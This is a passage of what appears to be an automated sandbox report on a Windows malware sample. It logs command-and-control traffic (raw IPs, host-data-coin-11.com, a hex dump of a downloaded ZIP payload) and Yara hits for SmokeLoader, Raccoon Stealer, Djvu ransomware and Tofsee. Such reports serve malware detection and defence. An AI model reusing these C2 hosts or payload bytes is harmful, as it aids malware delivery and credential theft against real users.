                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df e1 fb 43 a2 04 ee 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%C0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3b 47 a3 f7 c2 aa b9 01 ac 52 cc 77 f8 00 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU;GRw0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 41 6f c6 15 eb f8 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevAofdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 
2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pggcfgsws.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49870 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49875 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.4:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.4:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49900 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                      Source: V91yW08J6p.exe, 00000000.00000002.674814337.000000000071A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Raccoon Stealer
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Djvu Ransomware
                      Source: Yara matchFile source: 00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.915798638.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.924493030.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.918689335.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000001.929538052.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.947898819.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.922458766.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR

                      System Summary:

                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_0040BC4D
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004114F7
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004108BB
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00410DFF
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00412258
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_0040425E
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00410377
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00543253
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_005431FF
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402A5F
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402AB3
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402A5F
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00613253
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_006131FF
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0048160C
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004815DE
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004815F6
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0640
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0C40
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E0A50
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E14D0
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D196F0
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D10470
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D10460
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C21810
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C253F8
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C20448
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C22E48
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3A430
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C31528
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C367B8
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C34758
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C32C88
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3AD68
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C308B0
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C35B58
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C3B638
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_04C390D3
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: V91yW08J6p.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6AF.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FF1A.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D5.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1365.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28B3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28B3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7CCD.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 76E7.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6902.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vsiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: adiicvb.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qxoxlxqh.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: webio.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
